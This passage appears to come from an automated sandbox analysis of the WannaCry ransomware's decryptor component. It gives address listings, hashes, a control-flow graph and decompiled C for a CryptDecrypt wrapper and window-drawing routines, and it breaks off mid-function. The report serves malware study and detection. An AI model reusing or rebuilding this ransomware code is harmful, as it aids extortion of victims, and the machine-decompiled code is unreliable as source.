                                  0x0040d39a
                                  0x0040d39c
                                  0x0040d3a0
                                  0x0040d3a2
                                  0x0040d3a9
                                  0x00000000
                                  0x0040d3a9
                                  0x0040d363
                                  0x0040d363
                                  0x0040d36e
                                  0x0040d403
                                  0x0040d407
                                  0x0040d408
                                  0x0040d40d
                                  0x0040d411
                                  0x0040d414
                                  0x0040d416
                                  0x0040d41a
                                  0x0040d41c
                                  0x0040d424
                                  0x0040d42d
                                  0x0040d42f
                                  0x00000000
                                  0x00000000
                                  0x0040d442
                                  0x0040d445
                                  0x0040d447
                                  0x0040d480
                                  0x0040d480
                                  0x0040d486
                                  0x00000000
                                  0x0040d449
                                  0x0040d449
                                  0x0040d44f
                                  0x0040d452
                                  0x0040d457
                                  0x0040d459
                                  0x0040d460
                                  0x0040d463
                                  0x0040d467
                                  0x0040d46b
                                  0x0040d471
                                  0x0040d471
                                  0x0040d47d
                                  0x0040d487
                                  0x0040d487
                                  0x0040d48c
                                  0x0040d48f
                                  0x0040d491
                                  0x0040d420
                                  0x00000000
                                  0x0040d420
                                  0x0040d491
                                  0x0040d457
                                  0x0040d449
                                  0x00000000
                                  0x0040d447
                                  0x0040d424
                                  0x0040d493
                                  0x0040d493
                                  0x0040d49a
                                  0x0040d4a0
                                  0x0040d4a2
                                  0x0040d4a4
                                  0x0040d4a6
                                  0x0040d4a9
                                  0x0040d4ae
                                  0x0040d4a6
                                  0x0040d4a2
                                  0x0040d4bd
                                  0x0040d4bd
                                  0x0040d361
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d346
                                  0x0040d346
                                  0x0040d322
                                  0x0040d32b
                                  0x0040d32b

                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                  0x00404af1
                                  0x00404afa
                                  0x00404b04
                                  0x00404b04
                                  0x00404b08
                                  0x00404b0e
                                  0x00404b22
                                  0x00404b2a
                                  0x00404b2b
                                  0x00404b3b
                                  0x00404b49
                                  0x00404b4d
                                  0x00404b50
                                  0x00404b60
                                  0x00404b67
                                  0x00404b2d
                                  0x00404b2d
                                  0x00404b38
                                  0x00404b38
                                  0x00404afe
                                  0x00404b01
                                  0x00404b01

                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 271 4090f0-40911e 272 409124-40915c #540 #3874 271->272 273 40971e-409736 271->273 274 409185-40918c 272->274 275 40915e-409163 272->275 276 40919c-4091c4 _ftol 274->276 277 40918e-409197 #860 274->277 278 409165-40916c 275->278 279 4091c8-4091cf 275->279 276->279 277->276 282 40917c-409183 278->282 283 40916e-409177 #860 278->283 280 4091d5-409327 SendMessageA #2860 call 409df0 call 409870 #5875 #6170 GetWindowOrgEx #540 #2818 279->280 281 40970a-409719 #800 279->281 289 409329-409357 GetObjectA 280->289 290 40935b-409389 GetTextExtentPoint32A 280->290 281->273 282->279 283->282 289->290 291 4093a1-4093a4 290->291 292 40938b-40939f 290->292 294 4093a6-4093b6 291->294 295 4093b8-4093bd 291->295 293 4093f6-40940b GetViewportOrgEx 292->293 299 409411-409430 call 409d40 293->299 300 4094a9-4094f3 293->300 296 4093f2 294->296 297 4093d9-4093de 295->297 298 4093bf-4093d7 295->298 296->293 297->293 301 4093e0-4093f0 297->301 298->293 307 409432 299->307 308 409436-409444 299->308 305 4094f5-409512 300->305 306 409517-409525 300->306 301->296 311 40961a-409658 #800 305->311 309 409527-409535 306->309 310 40953d-409553 306->310 307->308 308->311 312 40944a-4094a4 308->312 309->310 314 4095b3-4095bf 310->314 315 409555-409568 310->315 319 409662-40967b 311->319 320 40965a-40965d #6170 311->320 322 409610-409612 312->322 314->311 318 4095c1-4095d1 314->318 326 40956a 315->326 327 40956e-4095ab 315->327 328 4095d3 318->328 329 4095d7-40960c 318->329 324 409685-40969c 319->324 325 40967d-409680 #5875 319->325 320->319 322->311 330 4096a6-4096bc 324->330 331 40969e-4096a1 324->331 325->324 326->327 327->314 328->329 329->322 332 4096c8-409702 #2414 * 2 330->332 333 4096be-4096c3 330->333 331->330 332->281 333->332
                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                  0x004090f6
                                  0x004090f8
                                  0x004090fd
                                  0x004090fe
                                  0x00409105
                                  0x0040910c
                                  0x00409115
                                  0x0040911c
                                  0x0040911e
                                  0x0040971e
                                  0x00409729
                                  0x00409736
                                  0x00409736
                                  0x00409124
                                  0x0040912f
                                  0x00409133
                                  0x00409137
                                  0x00409142
                                  0x00409143
                                  0x0040914a
                                  0x00409152
                                  0x0040915c
                                  0x0040918c
                                  0x0040918e
                                  0x00409197
                                  0x00409197
                                  0x0040919c
                                  0x004091a7
                                  0x004091ad
                                  0x004091b1
                                  0x004091bb
                                  0x004091bf
                                  0x004091c4
                                  0x0040915e
                                  0x00409163
                                  0x0040916c
                                  0x0040916e
                                  0x00409177
                                  0x00409177
                                  0x0040917f
                                  0x0040917f
                                  0x00409163
                                  0x004091c8
                                  0x004091cf
                                  0x0040970a
                                  0x0040970e
                                  0x00409719
                                  0x00000000
                                  0x004091d5
                                  0x004091dd
                                  0x004091e4
                                  0x004091e9
                                  0x004091eb
                                  0x004091ef
                                  0x004091fb
                                  0x00409203
                                  0x00409208
                                  0x00409215
                                  0x0040921d
                                  0x00409225
                                  0x0040922d
                                  0x00409235
                                  0x0040923e
                                  0x00409246
                                  0x0040924e
                                  0x00409256
                                  0x00409259
                                  0x00409260
                                  0x00409264
                                  0x0040926b
                                  0x0040926f
                                  0x00409277
                                  0x00409282
                                  0x0040928d
                                  0x00409292
                                  0x00409296
                                  0x0040929d
                                  0x004092a1
                                  0x004092a5
                                  0x004092ad
                                  0x004092b8
                                  0x004092c0
                                  0x004092c5
                                  0x004092c9
                                  0x004092d9
                                  0x004092e1
                                  0x004092f3
                                  0x004092f7
                                  0x004092fb
                                  0x00409308
                                  0x0040930d
                                  0x0040930e
                                  0x0040930f
                                  0x00409317
                                  0x0040931c
                                  0x0040931f
                                  0x00409323
                                  0x00409327
                                  0x00409337
                                  0x00409355
                                  0x00409357
                                  0x00409357
                                  0x0040935b
                                  0x0040935f
                                  0x00409363
                                  0x0040936f
                                  0x0040937b
                                  0x00409381
                                  0x00409389
                                  0x004093a4
                                  0x004093bd
                                  0x004093de
                                  0x00000000
                                  0x00000000
                                  0x004093e0
                                  0x004093e8
                                  0x004093ec
                                  0x004093f0
                                  0x004093f2
                                  0x004093f2
                                  0x00000000
                                  0x004093f2
                                  0x004093bf
                                  0x004093c7
                                  0x004093cb
                                  0x004093cf
                                  0x004093d3
                                  0x00000000
                                  0x004093d3
                                  0x004093a6
                                  0x004093ae
                                  0x004093b2
                                  0x00000000
                                  0x0040938b
                                  0x0040938f
                                  0x00409393
                                  0x00409397
                                  0x0040939b
                                  0x004093f6
                                  0x004093ff
                                  0x0040940b
                                  0x004094b9
                                  0x004094cc
                                  0x004094d5
                                  0x004094e8
                                  0x004094f3
                                  0x00409517
                                  0x00409525
                                  0x00409537
                                  0x00409537
                                  0x0040953d
                                  0x00409553
                                  0x0040955d
                                  0x00409568
                                  0x0040956a
                                  0x0040956a
                                  0x0040956e
                                  0x00409572
                                  0x00409579
                                  0x00409580
                                  0x0040958e
                                  0x0040959b
                                  0x004095ad
                                  0x004095ad
                                  0x004095bf
                                  0x0040961a
                                  0x0040962d
                                  0x00409634
                                  0x0040963c
                                  0x00409641
                                  0x00409649
                                  0x0040964d
                                  0x00409658
                                  0x0040965a
                                  0x0040965d
                                  0x0040965d
                                  0x00409662
                                  0x0040966d
                                  0x00409671
                                  0x0040967b
                                  0x0040967d
                                  0x00409680
                                  0x00409680
                                  0x00409685
                                  0x0040968d
                                  0x00409691
                                  0x0040969c
                                  0x004096a3
                                  0x004096a3
                                  0x004096a6
                                  0x004096ae
                                  0x004096b2
                                  0x004096bc
                                  0x004096c5
                                  0x004096c5
                                  0x004096cc
                                  0x004096d4
                                  0x004096d9
                                  0x004096dd
                                  0x004096e5
                                  0x004096ed
                                  0x004096f5
                                  0x004096fa
                                  0x00409702
                                  0x00000000
                                  0x004095c1
                                  0x004095c9
                                  0x004095d1
                                  0x004095d3
                                  0x004095d3
                                  0x004095e0
                                  0x004095eb
                                  0x004095ef
                                  0x004095fc
                                  0x00409604
                                  0x00409608
                                  0x0040960a
                                  0x0040960b
                                  0x0040960c
                                  0x00409610
                                  0x00409614
                                  0x00000000
                                  0x00409614
                                  0x004095bf
                                  0x0040950c
                                  0x00000000
                                  0x0040950c
                                  0x00409421
                                  0x0040942c
                                  0x00409430
                                  0x00409432
                                  0x00409432
                                  0x00409444
                                  0x00000000
                                  0x0040944a
                                  0x0040945c
                                  0x0040945f
                                  0x00409467
                                  0x00409478
                                  0x0040948e
                                  0x00409491
                                  0x0040949b
                                  0x0040949c
                                  0x004094a3
                                  0x00000000
                                  0x004094a3
                                  0x00409444
                                  0x00409389

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 7e6b703d67e7595773a4bd55965276fd3caf6c6c14634650179ea244f19e8907
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
									__eflags = _t98;
									if(_t98 == 0) {
										goto L34;
									}
									__eflags = _t198 - _t136;
									if(_t198 < _t136) {
										goto L34;
									}
									_t199 = 0;
									__eflags = _t98;
									if(_t98 <= 0) {
										goto L33;
									}
									_t126 = _t98;
									do {
										_push( *((intOrPtr*)(_t136 + _t199 +  *_t212 - 1)));
										_push(_t199);
										L00412E12();
										_push(1);
										_push( *(_t208 + 0x74) + _t199);
										L00412E0C();
										_t136 =  *(_t208 + 0x74);
										_t199 = _t199 + _t136;
										_t126 = _t126 - 1;
										__eflags = _t126;
									} while (_t126 != 0);
									goto L33;
								}
								_t213 = _t208 + 0x44;
								_t142 =  *(_t208 + 0x74);
								_t200 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
								asm("cdq");
								_t104 = _t200 / _t142;
								__eflags = _t104;
								if(_t104 == 0) {
									L22:
									_t104 = 1;
									L23:
									_t201 = 0;
									__eflags = _t104;
									if(_t104 <= 0) {
										goto L33;
									}
									_t127 = _t104;
									do {
										_push( *((intOrPtr*)(_t201 +  *_t213)));
										_push(_t142 + _t201);
										L00412E12();
										_push(1);
										_push(_t201);
										L00412E0C();
										_t142 =  *(_t208 + 0x74);
										_t201 = _t201 + _t142;
										_t127 = _t127 - 1;
										__eflags = _t127;
									} while (_t127 != 0);
									goto L33;
								}
								__eflags = _t200 - _t142;
								if(_t200 >= _t142) {
									goto L23;
								}
								goto L22;
							}
							_t106 =  &_v32;
							_push( *(_t208 + 0x74));
							_push(_t106);
							L00412E24();
							_push( *(_t208 + 0x74));
							_push( &_v24);
							_v12 = 8;
							L00412E30();
							_push( &_v48);
							_push(_t106);
							_push( &_v36);
							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
